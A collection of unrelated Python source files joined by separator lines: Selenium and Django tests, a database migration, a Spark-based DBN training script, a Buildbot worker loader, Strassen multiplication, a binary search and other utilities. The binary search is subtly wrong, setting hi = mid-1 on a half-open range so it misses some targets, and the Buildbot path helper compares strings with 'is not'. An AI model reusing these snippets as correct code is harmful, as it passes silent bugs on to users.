finally: self.accept_next_alert = True
def tearDown(self):
self.driver.quit()
self.assertEqual([], self.verificationErrors)
if __name__ == "__main__":
unittest.main()
class ChromeSimilar(unittest.TestCase):
def setUp(self):
self.driver = webdriver.Chrome(chromedriver_path)
self.driver.implicitly_wait(30)
self.base_url = "https://www.katalon.com/"
self.verificationErrors = []
self.accept_next_alert = True
def test_chrome_similar(self):
driver = self.driver
driver.get("http://35.230.88.48/")
Select(driver.find_element_by_name("dropdown")).select_by_visible_text("Bathroom")
driver.find_element_by_name("q").clear()
driver.find_element_by_name("q").send_keys("94110")
driver.find_element_by_name("q").send_keys(Keys.ENTER)
self.assertEqual("No parks matched your zip code, here are reports that share the bathroom category.", driver.find_element_by_xpath("//div[1]/p[2]").text)
def is_element_present(self, how, what):
try: self.driver.find_element(by=how, value=what)
except NoSuchElementException as e: return False
return True
def is_alert_present(self):
try: self.driver.switch_to_alert()
except NoAlertPresentException as e: return False
return True
def close_alert_and_get_its_text(self):
try:
alert = self.driver.switch_to_alert()
alert_text = alert.text
if self.accept_next_alert:
alert.accept()
else:
alert.dismiss()
return alert_text
finally: self.accept_next_alert = True
def tearDown(self):
self.driver.quit()
self.assertEqual([], self.verificationErrors)
if __name__ == "__main__":
unittest.main()
|
from sqlalchemy import MetaData, Table, Column, Integer, NVARCHAR
meta = MetaData()
def upgrade(migrate_engine):
meta.bind = migrate_engine
t = Table(
"journal",
meta,
Column("id", Integer, primary_key=True),
Column("name", NVARCHAR(500), index=True),
)
t.create()
def downgrade(migrate_engine):
meta.bind = migrate_engine
t = Table("journal", meta, autoload=True)
t.drop()
|
""" Open datasets """
from .base import Openset, ImagesOpenset
from .mnist import MNIST
from .cifar import CIFAR10, CIFAR100
|
from abc import ABCMeta, abstractmethod
class AnalysisBase(metaclass=ABCMeta):
@abstractmethod
def run(self, user_request):
pass
|
import os
from appconf import AppConf
from django.conf import settings
class XMLAppConf(AppConf):
class Meta:
prefix = "xml"
|
import sympy.physics.mechanics as _me
import sympy as _sm
import math as m
import numpy as _np
x, y = _me.dynamicsymbols('x y')
a, b, r = _sm.symbols('a b r', real=True)
eqn = _sm.Matrix([[0]])
eqn[0] = a*x**3+b*y**2-r
eqn = eqn.row_insert(eqn.shape[0], _sm.Matrix([[0]]))
eqn[eqn.shape[0]-1] = a*_sm.sin(x)**2+b*_sm.cos(2*y)-r**2
matrix_list = []
for i in eqn:matrix_list.append(i.subs({a:2.0, b:3.0, r:1.0}))
print(_sm.nsolve(matrix_list,(x,y),(_np.deg2rad(30),3.14)))
|
"""
Tests for the custom serialization code used by the API application.
Copyright (C) 2020 Nicholas H.Tollervey.
"Commons Clause" License Condition v1.0:
The Software is provided to you by the Licensor under the License, as defined
below, subject to the following condition.
Without limiting other conditions in the License, the grant of rights under the
License will not include, and the License does not grant to you, the right to
Sell the Software.
For purposes of the foregoing, "Sell" means practicing any or all of the rights
granted to you under the License to provide to third parties, for a fee or
other consideration (including without limitation fees for hosting or
consulting/support services related to the Software), a product or service
whose value derives, entirely or substantially, from the functionality of the
Software. Any license notice or attribution required by the License must also
include this Commons Clause License Condition notice.
MIT License:
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
from unittest import mock
from api import serializers
from rest_framework.exceptions import ValidationError
from django.test import TestCase
class TagPathFieldTestCase(TestCase):
"""
Exercises the bespoke TagPathField.
"""
def test_to_representation(self):
"""
The string representation of the tag path is simply passed through
without any change.
"""
field = serializers.TagPathField()
val = "namespace/tag"
self.assertEqual(val, field.to_representation(val))
def test_to_internal_value_not_string(self):
"""
When validation is called, to_internal raises a ValidationError if the
passed in value is not a string.
"""
field = serializers.TagPathField()
val = 1
with self.assertRaises(ValidationError):
field.run_validation(val)
def test_to_internal_value_incorrect_format(self):
"""
When an incorrectly formatted string is passed in, during validation,
to_internal raises a ValidationError.
"""
field = serializers.TagPathField()
val = "incorrect-tag-path"
with self.assertRaises(ValidationError):
field.run_validation(val)
def test_to_internal_value_is_correct(self):
"""
A valid tag path passes validation.
"""
field = serializers.TagPathField()
val = "namespace-name/tag_name"
result = field.run_validation(val)
self.assertEqual(result, val)
class TagValueDictFieldTestCase(TestCase):
"""
Exercises the TagValueDictField. This is a bespoke DictField that ensures
keys are valid TagPathFields.
"""
def test_get_value_is_html(self):
"""
Ensure that getting the value of the field works with HTML form fields.
"""
field = serializers.TagValueDictField()
field.field_name = "test_field"
test_dict = {}
mock_html = mock.MagicMock()
mock_html.parse_html_dict.return_value = "it worked!"
with mock.patch("api.serializers.html", mock_html):
result = field.get_value(test_dict)
self.assertEqual("it worked!", result)
mock_html.is_html_input.assert_called_once_with(test_dict)
mock_html.parse_html_dict.assert_called_once_with(
test_dict, prefix=field.field_name
)
def test_get_value(self):
"""
Ensure that getting the value of the field works with native dictionary
representations.
"""
field = serializers.TagValueDictField()
field.field_name = "test_field"
test_dict = mock.MagicMock()
test_dict.get.return_value = "it worked!"
mock_html = mock.MagicMock()
mock_html.is_html_input.return_value = False
with mock.patch("api.serializers.html", mock_html):
result = field.get_value(test_dict)
self.assertEqual("it worked!", result)
test_dict.get.assert_called_once_with(
field.field_name, serializers.serializers.empty
)
def test_to_internal_value_html_input(self):
"""
If the input data is from an HTML form, ensure it is parsed into a
dictionary object before further validation occurs.
"""
field = serializers.TagValueDictField()
field.field_name = "test_field"
test_dict = "a dict in html"
mock_html = mock.MagicMock()
mock_html.is_html_input.return_value = True
dict_result = {
"namespace_name/tag-name": "a value",
}
mock_html.parse_html_dict.return_value = dict_result
with mock.patch("api.serializers.html", mock_html):
result = field.to_internal_value(test_dict)
self.assertEqual(dict_result, result)
def test_to_internal_value_not_dict(self):
"""
When validation is called, to_internal raises a ValidationError if the
passed in value is not a dictionary.
"""
field = serializers.TagValueDictField()
val = 123
mock_html = mock.MagicMock()
mock_html.is_html_input.return_value = False
with mock.patch("api.serializers.html", mock_html):
with self.assertRaises(ValidationError):
field.to_internal_value(val)
def test_to_internal_value_is_empty(self):
"""
When validation is called, to_internal raises a ValidationError if the
passed in value is not a dictionary.
"""
field = serializers.TagValueDictField(allow_empty=False)
val = {}
mock_html = mock.MagicMock()
mock_html.is_html_input.return_value = False
with mock.patch("api.serializers.html", mock_html):
with self.assertRaises(ValidationError):
field.to_internal_value(val)
def test_to_representation(self):
"""
The dict representation is simply passed through without any change.
"""
field = serializers.TagValueDictField()
val = {
"namespace_name/tag-name": "a value",
}
self.assertEqual(val, field.to_representation(val))
def test_run_child_validation(self):
"""
A dictionary containing correctly formatted keys is checked and
returned without raising any errors.
"""
field = serializers.TagValueDictField()
val = {
"namespace_name/tag-name": "a value",
}
result = field.run_child_validation(val)
self.assertEqual(result, val)
def test_run_child_validation_bad_key(self):
"""
A dictionary with an incorrectly formatted key results in a
ValidationError exception being thrown.
"""
field = serializers.TagValueDictField()
val = {
"namespace_name--tag-name": "a value",
}
with self.assertRaises(ValidationError):
field.run_child_validation(val)
|
# -*- coding:UTF-8 -*-
# select parameters to output DBN model
import numpy as np
np.random.seed(1337) # for reproducibility
from sklearn.datasets import load_boston
from sklearn.cross_validation import train_test_split
from sklearn.metrics.regression import r2_score, mean_squared_error
from sklearn.preprocessing import MinMaxScaler
from sklearn.preprocessing import StandardScaler
from dbn.tensorflow import SupervisedDBNRegression
import matplotlib
matplotlib.use('Agg')
import scipy.io as scio
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
import sys
import os
sys.path.append(os.getcwd())
from numpy import exp
from pyspark import *
#from dbn import mylogging
import json
sc = SparkContext("local[16]","stock",batchSize=1000)
def makegraphe(a,b,name_png):
x = a
y = b
plt.scatter(x, y,c='r',alpha=0.5)
plt.savefig(name_png)
def readargs(i):
f = open("args.cfg","r")
ss = ""
ii = 0
for x in f.readlines():
ss = x
ss = ss.replace("\n","")
if ss == "" :
continue
if int(ii) == int(i):
print(ii,i,"---------------")
break
ii = ii + 1
f.close()
print(ss)
return json.loads(ss)
def main(argv):
argno = argv[1]
print("_----------------------------:",argv[1])
__args = readargs(argno)
print(__args)
(tr,ts,testr,tests) = train_args(__args["hidden_layers_structure"],
__args["learning_rate_rbm"],
__args["learning_rate"],
__args["n_epochs_rbm"],
__args["n_iter_backprop"],
__args["batch_size"],
__args["activation_function"],
__args["dropout_p"],
argno
)
writelog("{} {} {} {} {} {} {} {} {} {} {} {} {}\n".format(__args["i"] \
,tr,ts,testr,tests,__args["hidden_layers_structure"], \
__args["learning_rate_rbm"], \
__args["learning_rate"], \
__args["n_epochs_rbm"], \
__args["n_iter_backprop"], \
__args["batch_size"], \
__args["activation_function"], \
__args["dropout_p"] \
))
def writelog(context):
f = open("result.log","a+")
f.write(context)
f.close()
def train_args(hidden_layers_structure,learning_rate_rbm,learning_rate,n_epochs_rbm,
n_iter_backprop,batch_size,activation_function,dropout_p,argno):
########################################################################
global sc
lines = sc.textFile("/data",2)
print(lines.count())
lines = lines.map(lambda s : np.fromstring(s,dtype=np.float32,sep=" "))
l = []
total_num_input=18
# Training
regressor = SupervisedDBNRegression(hidden_layers_structure=hidden_layers_structure,
learning_rate_rbm=learning_rate_rbm,
learning_rate=learning_rate,
n_epochs_rbm=n_epochs_rbm,
n_iter_backprop=n_iter_backprop,
batch_size=batch_size,
activation_function=activation_function,
dropout_p=dropout_p)
for x in lines.toLocalIterator():
l.append(x)
if(len(l)>=28881):
idata = np.array(l)
X=idata[:,1:total_num_input+1]
Y=idata[:,0]
#X = minmax(X)
# Splitting data
X_train = X[0:19000,:]
X_test = X[19000:28881,:]
Y_train = Y[0:19000]
Y_test = Y[19000:28881]
# Train
X_train_select = X_train[:,0:total_num_input]
regressor.fit(X_train_select, Y_train)
# Save the model
regressor.save('./out/model_{}.pkl'.format(argno))
# regressor.save('model.pkl')
Y_train_pred = regressor.predict(X_train_select)
# l = []
print('Done.\nR-squared: %f\nMSE: %f' % (r2_score(Y_train, Y_train_pred), mean_squared_error(Y_train, Y_train_pred)))
##########################################################################################################
# Test
##########################################################################################################
X_test_select = X_test[:,0:total_num_input]
Y_test_pred = regressor.predict(X_test_select)
print('Done.\nR-squared: %f\nMSE: %f' % (r2_score(Y_test, Y_test_pred), mean_squared_error(Y_test, Y_test_pred)))
##########################################################################################################
return(r2_score(Y_train, Y_train_pred), mean_squared_error(Y_train, Y_train_pred),
r2_score(Y_test, Y_test_pred), mean_squared_error(Y_test, Y_test_pred))
if __name__ == '__main__':
sys.exit(main(sys.argv))
|
f1 = open('A-large.in','r')
f2 = open('output','w')
t = int(f1.readline())
for i in range(1,t+1):
a = int(f1.readline())
if a == 0:
f2.write("Case #"+str(i)+": INSOMNIA\n")
else:
digithash = [0] * 10
remaining_digits = 10
no = 1
while True:
temp = no*a
while temp != 0:
if digithash[temp%10] == 0:
remaining_digits -= 1
digithash[temp%10] = 1
temp = int(temp/10)
#print temp, digithash, remaining_digits
#x = input()
if remaining_digits == 0:
break
no += 1
f2.write("Case #"+str(i)+": "+str(no*a)+"\n")
f1.close()
f2.close()
|
""" Buildbot inplace config
(C) Copyright 2015 HicknHack Software GmbH
The original code can be found at:
https://github.com/hicknhack-software/buildbot-inplace-config
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from glob import glob
from os import path
from twisted.python import log
from yaml import safe_load
from buildbot.worker import Worker as BuildbotWorker
from pprint import pformat
def _normalize_path(p):
s = p.replace("\\", "/")
if s[-1] is not "/":
s += "/"
return s
class Worker(dict):
@property
def name(self):
return self['name']
@property
def password(self):
return self['password']
@property
def shell(self):
return self['shell']
@property
def setup_dir(self):
return _normalize_path(self['setupDir'])
@property
def platforms(self):
return self['platforms']
@property
def setups(self):
return self['setups']
def build_worker(self):
return BuildbotWorker(self.name, self.password)
@staticmethod
def load(workers_dir, inplace_workers, workers):
files = glob(path.join(workers_dir, '*.yml'))
if not files:
raise Exception("No workers found in '%s'!" % workers_dir)
workers.clear()
inplace_workers.clear()
for f in files:
s = open(f, 'r')
worker_dict = safe_load(s)
s.close()
if not isinstance(worker_dict, dict):
continue
inplace_worker = Worker(**worker_dict)
inplace_workers.named_set(inplace_worker)
log.msg("Registered Worker '%s' on %s with setups %s" %
(inplace_worker.name, pformat(inplace_worker.platforms), pformat(inplace_worker.setups)),
system='Inplace Config')
workers.named_set(inplace_worker.build_worker())
|
"""
Created on 2 Mar. 2018
@author: oliver
"""
class ClassifiedLine(object):
"""
classdocs
"""
def __init__(self, filename, line_number, classification):
"""
Constructor
"""
self.filename = filename
self.line_number = line_number
self.classification = classification
self._secondary_classifications = []
def add_secondary_classification(self, classification):
"""Add secondary classification. Mostly for debugging purposes"""
self._secondary_classifications.append(classification)
|
import matplotlib.pyplot as plt
import numpy as np
import wave
import sys
from scipy import signal
def visualize_wave(path, step, target):
spf = wave.open(path + str(step) + "k_steps_"+ str(target) + "_target_pcm.wav", "r")
# Extract Raw Audio from Wav File
signal = spf.readframes(-1)
sample_frequency = 16000
signal = np.fromstring(signal, "Int16")
data = np.fromstring(spf.readframes(sample_frequency), dtype=np.int16)
fs = spf.getframerate()
channels = [signal[channel::spf.getnchannels()] for channel in range(spf.getnchannels())]
# for the entire wave file
signal = signal[:]
# for a segement of the wave file
#signal = signal[25000:32000]
#left, right = data[0::2], da[1::2]
#lf, rf = abs(np.fft.rfft(left)), abs(np.fft.rfft(right))
# If Stereo
if spf.getnchannels() == 2:
print("Just mono files")
#sys.exit(0)
Time = np.linspace(0, len(signal)/len(channels)/ fs, num=len(signal)/len(channels))
#plt.figure(figsize=(7, 4))
plt.figure(1)
# Normal amplitude graph of wave file
a = plt.subplot(211)
plt.title("Vocoder " + str(step) + "k steps " + str(target) + " target")
# To deal with stereo inputs
for channel in channels:
plt.plot(Time, channel)
a.set_xlabel("Time (seconds)")
a.set_ylabel("Amplitude")
# Spectrum of wave file
c = plt.subplot(212)
Pxx, freqs, bins, im = c.specgram(signal, NFFT=1024, Fs=16000, noverlap=900)
c.set_xlabel("Time (seconds)")
c.set_ylabel("Frequency")
plt.savefig("./wav_visualizations/vocoder_" + str(step) + "k_steps_" + str(target) + "_target_wav_visualization.png")
plt.show()
if __name__ == "__main__":
# Note: to run the visualization, the wav files generated by the vocoder must first be in the PCM format.
# Can do so by using some online converter or other software to change formats to Wav-PCM
visualize_wave("./vocoder/saved_models/initial_english_run_modified/", 13, 4)
|
#coding: latin1
def matrix_product0(A: "matrix", B: "matrix") -> "matrix": #[intro0
p, q, r = len(A), len(A[0]), len(B[0])
C = [[0] * r for i in range(p)]
for i in range(p):
for j in range(r):
for k in range(q):
C[i][j] += A[i][k]*B[k][j]
return C #]intro0
def matrix_product(A: "matrix", B: "matrix") -> "matrix": #[intro
p, q, r = len(A), len(A[0]), len(B[0])
return [[sum(A[i][k]*B[k][j] for k in range(q)) for j in range(r)] for i in range(p)] #]intro
#< strassen
class SqMatrix:
def __init__(self, A: "square matrix"=None, n: "int"=0):
if A != None:
if any(len(A) != len(row) for row in A): raise Exception("Non square matrix")
self.n, self.A = len(A), A
else:
self.n, self.A = n, [[0] * n for _ in range(n)]
def __getitem__(self, ij: "(int, int)"):
return self.A[ij[0]][ij[1]]
def __setitem__(self, ij: "(int, int)", value: "T"):
self.A[ij[0]][ij[1]] = value
return value
def __add__(self, other: "SqMatrix"):
if other.n != self.n: raise Exception("Different size matrices.")
r = SqMatrix([[self[i,j]+other[i,j] for j in range(self.n)] for i in range(self.n)])
return r
def __sub__(self, other: "SqMatrix"):
if other.n != self.n: raise Exception("Different size matrices.")
r = SqMatrix([[self[i,j]-other[i,j] for j in range(self.n)] for i in range(self.n)])
return r
def split(self):
mid = self.n // 2
a = SqMatrix([[self[i,j] for j in range(mid)] for i in range(mid)])
b = SqMatrix([[self[i,j] for j in range(mid, self.n)] for i in range(mid)])
c = SqMatrix([[self[i,j] for j in range(mid)] for i in range(mid, self.n)])
d = SqMatrix([[self[i,j] for j in range(mid, self.n)] for i in range(mid, self.n)])
return a, b, c, d
def join(self, a: "SqMatrix", b: "SqMatrix", c: "SqMatrix", d: "SqMatrix"):
mid = self.n // 2
for i in range(mid):
for j in range(mid): self[i,j] = a[i,j]
for j in range(mid, self.n): self[i,j] = b[i,j-mid]
for i in range(mid, self.n):
for j in range(mid): self[i,j] = c[i-mid,j]
for j in range(mid, self.n): self[i,j] = d[i-mid,j-mid]
def __mul__(self, other: "SqMatrix"):
if other.n != self.n: raise Exception("Different size matrices.")
if self.n == 1: return SqMatrix([[self[0,0]*other[0,0]]])
a, b, c, d = self.split()
e, f, g, h = other.split()
P1 = a * (f - h)
P2 = (a + b) * h
P3 = (c + d) * e
P4 = d * (g - e)
P5 = (a + d) * (e + h)
P6 = (b - d) * (g + h)
P7 = (a - c) * (e + f)
r = P5 + P4 - P2 + P6
s = P1 + P2
t = P3 + P4
u = P5 + P1 - P3 - P7
result = SqMatrix(n=self.n)
result.join(r, s, t, u)
return result
#> strassen |
import os
import shutil
import time
from django import forms
from django.conf import settings
from django.core.cache import cache
from django.core.files.uploadedfile import SimpleUploadedFile
from django.test import Client, TestCase, override_settings
from django.urls import reverse
from posts.models import Group, Post, User
from yatube.settings import BASE_DIR
@override_settings(MEDIA_ROOT=os.path.join(BASE_DIR, 'temp_folder'))
class PostsPagesTests(TestCase):
@classmethod
def setUpClass(cls):
"""Создадим две записи, для одной из записей создадим группу
еще одну группу создадим но оставим пустой для проверки"""
super().setUpClass()
small_gif = (
b'\x47\x49\x46\x38\x39\x61\x02\x00'
b'\x01\x00\x80\x00\x00\x00\x00\x00'
b'\xFF\xFF\xFF\x21\xF9\x04\x00\x00'
b'\x00\x00\x00\x2C\x00\x00\x00\x00'
b'\x02\x00\x01\x00\x00\x02\x02\x0C'
b'\x0A\x00\x3B'
)
cls.uploaded = SimpleUploadedFile(
name='small.gif',
content=small_gif,
content_type='image/gif'
)
cls.empty_group = Group.objects.create(
title='Группа без постов',
slug='test_empty',
description='Пустая тестовая группа',
)
cls.filled_group = Group.objects.create(
title='Группа с постами',
slug='test_filled',
description='Тестовая группа c одним постом',
)
cls.test_post_with_gr = Post.objects.create(
text='Текст первого поста который относится к группе с постами',
author=User.objects.create(username='group_filled_username'),
group=cls.filled_group,
image=cls.uploaded,
)
time.sleep(0.1)
cls.user_author = User.objects.create_user(
username='group_empty_username'
)
cls.test_post_without_gr = Post.objects.create(
text='Текст второго поста у которого нет группы',
author=cls.user_author,
image=cls.uploaded,
)
cls.edit_post_id = cls.test_post_without_gr.id
@classmethod
def tearDownClass(cls):
shutil.rmtree(settings.MEDIA_ROOT, ignore_errors=True)
super().tearDownClass()
def setUp(self):
self.guest_client = Client()
self.authorized_client = Client()
self.authorized_client.force_login(PostsPagesTests.user_author)
def post_pages_use_correct_template(self):
"""URL-адрес использует соответствующий шаблон."""
templates_page_names = {
'index.html': reverse('posts:index'),
'new_post.html': reverse('posts:new_post'),
'group.html': (
reverse(
'posts:group_posts',
kwargs={'slug': f'{PostsPagesTests.empty_group.slug}'}
)
),
}
for template, reverse_name in templates_page_names.items():
with self.subTest(template=template):
response = self.authorized_client.get(reverse_name)
self.assertTemplateUsed(response, template)
def test_index_page_list_is_2(self):
""" Удостоверимся, что на главную страницу передаётся
ожидаемое количество объектов"""
response = self.authorized_client.get(reverse('posts:index'))
self.assertEqual(len(response.context['page']), 2)
def test_group_filled_slug_page_list_is_1(self):
""" Удостоверимся, что на страницу группы с одним постом передаётся
ожидаемое количество объектов"""
response = self.authorized_client.get(
reverse(
'posts:group_posts',
kwargs={'slug': f'{PostsPagesTests.filled_group.slug}'}
)
)
self.assertEqual(len(response.context['page']), 1)
def test_group_filled_slug_page_list_is_0(self):
""" Проверим, что пост не попал в группу,
для которой не был предназначен"""
response = self.authorized_client.get(
reverse(
'posts:group_posts',
kwargs={'slug': f'{PostsPagesTests.empty_group.slug}'}
)
)
self.assertEqual(len(response.context['page']), 0)
def test_index_page_show_correct_context(self):
"""Шаблон index сформирован с правильным контекстом."""
response = self.authorized_client.get(reverse('posts:index'))
first_object = response.context['page'][0]
post_text_0 = first_object.text
post_image_0 = first_object.image
self.assertEqual(
post_text_0,
f'{PostsPagesTests.test_post_without_gr.text}'
)
self.assertTrue(post_image_0 is not None)
def test_group_page_show_correct_context(self):
"""Шаблон group сформирован с правильным контекстом."""
response = self.authorized_client.get(
reverse(
'posts:group_posts',
kwargs={'slug': f'{PostsPagesTests.filled_group.slug}'}
)
)
first_object = response.context['page'][0]
post_text_0 = first_object.text
post_image_0 = first_object.image
self.assertEqual(
post_text_0,
f'{PostsPagesTests.test_post_with_gr.text}'
)
self.assertEqual(
response.context['group'].title,
f'{PostsPagesTests.filled_group.title}'
)
self.assertEqual(
response.context['group'].description,
f'{PostsPagesTests.filled_group.description}'
)
self.assertEqual(
response.context['group'].slug,
f'{PostsPagesTests.filled_group.slug}'
)
self.assertTrue(post_image_0 is not None)
def test_new_post_show_correct_context(self):
"""Шаблон new_post сформирован с правильным контекстом."""
response = self.authorized_client.get(reverse('posts:new_post'))
form_fields = {
'group': forms.fields.ChoiceField,
'text': forms.fields.CharField,
}
for value, expected in form_fields.items():
with self.subTest(value=value):
form_field = response.context['form'].fields[value]
self.assertIsInstance(form_field, expected)
def test_profile_show_correct_context(self):
"""Страница профиля сформирован с правильным контекстом."""
response = self.authorized_client.get(
reverse(
'posts:profile',
kwargs={'username': f'{PostsPagesTests.user_author.username}'}
)
)
first_object = response.context['page'][0]
post_text_0 = first_object.text
post_image_0 = first_object.image
self.assertEqual(
post_text_0,
f'{PostsPagesTests.test_post_without_gr.text}'
)
self.assertTrue(post_image_0 is not None)
def test_post_show_correct_context(self):
"""Страница поста сформирована с правильным контекстом."""
response = self.authorized_client.get(
reverse(
'posts:post',
kwargs={
'username': f'{PostsPagesTests.user_author.username}',
'post_id': PostsPagesTests.edit_post_id,
}
)
)
first_object = response.context['post']
post_text = first_object.text
post_image = first_object.image
self.assertEqual(
post_text,
f'{PostsPagesTests.test_post_without_gr.text}'
)
self.assertTrue(post_image is not None)
def test_post_edit_show_correct_context(self):
"""Страница редактирования поста сформирована
с правильным контекстом."""
response = self.authorized_client.get(
reverse(
'posts:post_edit',
kwargs={
'username': f'{PostsPagesTests.user_author.username}',
'post_id': PostsPagesTests.edit_post_id,
}
)
)
form_fields = {
'group': forms.fields.ChoiceField,
'text': forms.fields.CharField,
}
for value, expected in form_fields.items():
with self.subTest(value=value):
form_field = response.context['form'].fields[value]
self.assertIsInstance(form_field, expected)
class IndexPaginatorTest(TestCase):
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.author = User.objects.create(username='test_user')
for i in reversed(range(1, 14)):
Post.objects.create(
text=f'Тестовый текст {i}го поста',
author=cls.author,
)
time.sleep(0.1)
def setUp(self):
self.guest_client = Client()
def test_first_page_contains_ten_records(self):
""" На главной странице 10 постов """
response = self.guest_client.get(reverse('posts:index'))
self.assertEqual(len(response.context['page']), 10)
def test_second_page_contains_three_records(self):
""" На второй странице должно быть три поста. """
response = self.guest_client.get(reverse('posts:index') + '?page=2')
self.assertEqual(len(response.context.get('page')), 3)
def test_index_page_show_correct_posts(self):
""" Посты выводятся в правильном порядке"""
response = self.guest_client.get(reverse('posts:index'))
first_object = response.context['page'][0]
post_text_0 = first_object.text
self.assertEqual(
post_text_0,
'Тестовый текст 1го поста'
)
class CacheIndexTest(TestCase):
def setUp(self):
self.guest_client = Client()
def test_cache_index_page(self):
"""Проверим что вывод главной страницы кэшируется корректно"""
Post.objects.create(
text='Тестовый текст первого поста',
author=User.objects.create(
username='test_username1'
)
)
first_response = self.guest_client.get(reverse('posts:index'))
Post.objects.create(
text='Тестовый текст второго поста',
author=User.objects.create(
username='test_username2'
)
)
second_response = self.guest_client.get(reverse('posts:index'))
first_response_content = first_response.content
second_response_content = second_response.content
self.assertEqual(
first_response_content,
second_response_content
)
cache.clear()
third_response = self.guest_client.get(reverse('posts:index'))
third_response_content = third_response.content
self.assertNotEqual(
first_response_content,
third_response_content
)
class FollowTests(TestCase):
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.follower_user = User.objects.create_user(
username='follower_user'
)
cls.followed_user = User.objects.create_user(
username='followed_user'
)
def setUp(self):
self.authorized_follower_client = Client()
self.authorized_followed_client = Client()
self.authorized_follower_client.force_login(
FollowTests.follower_user
)
self.authorized_followed_client.force_login(
FollowTests.followed_user
)
def test_follow_works_properly(self):
"""Проверим, что авторизованный пользователь может
подписываться на других пользователей"""
follower_number_initial = (FollowTests.followed_user.
following.all().count())
self.authorized_follower_client.get(
reverse(
'posts:profile_follow',
kwargs={
'username': f'{FollowTests.followed_user.username}',
}
)
)
follower_number_follow = (FollowTests.followed_user.
following.all().count())
self.assertNotEqual(
follower_number_initial,
follower_number_follow
)
def test_unfollow_works_properly(self):
"""Проверим, что авторизованный пользователь может
удалять пользователей из подписок"""
self.authorized_follower_client.get(
reverse(
'posts:profile_follow',
kwargs={
'username': f'{FollowTests.followed_user.username}',
}
)
)
follower_number_initial = (FollowTests.followed_user.
following.all().count())
self.authorized_follower_client.get(
reverse(
'posts:profile_unfollow',
kwargs={
'username': f'{FollowTests.followed_user.username}',
}
)
)
follower_number_unfollow = (FollowTests.followed_user.
following.all().count())
self.assertNotEqual(
follower_number_initial,
follower_number_unfollow
)
def test_new_posts_appear_in_follower_page(self):
"""Новая запись пользователя появляется в ленте тех, кто
на него подписан и не появляется в ленте тех, кто не подписан"""
self.authorized_follower_client.get(
reverse(
'posts:profile_follow',
kwargs={
'username': f'{FollowTests.followed_user.username}',
}
)
)
follower_intial_response = self.authorized_follower_client.get(
reverse('posts:follow_index')
)
followed_intial_response = self.authorized_followed_client.get(
reverse('posts:follow_index')
)
follower_initial_post_quantity = len(follower_intial_response.
context['page'])
followed_initial_post_quantity = len(followed_intial_response.
context['page'])
Post.objects.create(
text='Тестовый текст',
author=FollowTests.followed_user
)
follower_second_response = self.authorized_follower_client.get(
reverse('posts:follow_index')
)
followed_second_response = self.authorized_followed_client.get(
reverse('posts:follow_index')
)
follower_second_post_quantity = len(follower_second_response.
context['page'])
followed_second_post_quantity = len(followed_second_response.
context['page'])
self.assertNotEqual(
follower_initial_post_quantity,
follower_second_post_quantity
)
self.assertEqual(
followed_initial_post_quantity,
followed_second_post_quantity
)
|
class BinarySearch:
def __init__(self, arr, target):
self.arr = arr
self.target = target
def binary_search(self):
lo, hi = 0, len(self.arr)
while lo<hi:
mid = lo + (hi-lo)//2
# dont use (lo+hi)//2. Integer overflow.
# https://en.wikipedia.org/wiki/Binary_search_algorithm#Implementation_issues
if self.arr[mid] == self.target:
return mid
if self.arr[mid] > self.target:
hi = mid-1
else:
lo = mid+1
return -1
# input in python3 returns a string
n = int(input('Enter the size of array'))
# example of using map
# a = ['1', '2'] conver it into int
# a = list(map(int, a)) in python2 this will work a=map(int,a)
# in python3 map returns a map object which is a generator where as in py2 map returns a list
# n is used so that even if we enter n+1 numbers list will only contain n number
arr = list(map(int, input("Enter the number").strip().split()))[:n]
target = int(input("Enter the number to be searched"))
print(BinarySearch(arr, target).binary_search())
|
# -*- coding: utf-8 -*-
# BioSTEAM: The Biorefinery Simulation and Techno-Economic Analysis Modules
# Copyright (C) 2020-2021, Yoel Cortes-Pena <yoelcortes@gmail.com>
#
# This module is under the UIUC open-source license. See
# github.com/BioSTEAMDevelopmentGroup/biosteam/blob/master/LICENSE.txt
# for license details.
"""
"""
from . import Facility
from ..decorators import cost
from ... import HeatUtility
import numpy as np
__all__ = ('ChilledWaterPackage',)
@cost('Duty', S=-14*4184000, kW=3400*0.7457, cost=1375e3, CE=551, n=0.7, BM=1.5)
class ChilledWaterPackage(Facility):
"""
Create a chilled water package with capital cost and power based on the flow rate
of chilled water as in [1]_.
Parameters
----------
ID : str, optional
Unit ID.
References
----------
.. [1] Humbird, D., Davis, R., Tao, L., Kinchin, C., Hsu, D., Aden, A.,
Dudgeon, D. (2011). Process Design and Economics for Biochemical
Conversion of Lignocellulosic Biomass to Ethanol: Dilute-Acid
Pretreatment and Enzymatic Hydrolysis of Corn Stover
(No. NREL/TP-5100-47764, 1013269). https://doi.org/10.2172/1013269
"""
ticket_name = 'CWP'
network_priority = 0
_N_heat_utilities = 2
_units = {'Duty': 'kJ/hr'}
def __init__(self, ID='', agent=None):
self.agent = chilled_water = agent or HeatUtility.get_cooling_agent('chilled_water')
super().__init__(ID,
ins='recirculated_chilled_water',
outs=chilled_water.to_stream(),
thermo=chilled_water.thermo)
def _load_chilled_water_utilities(self):
self.chilled_water_utilities = cwu = set()
ID = self.agent.ID
for u in self.other_units:
if u is self: continue
for hu in u.heat_utilities:
agent = hu.agent
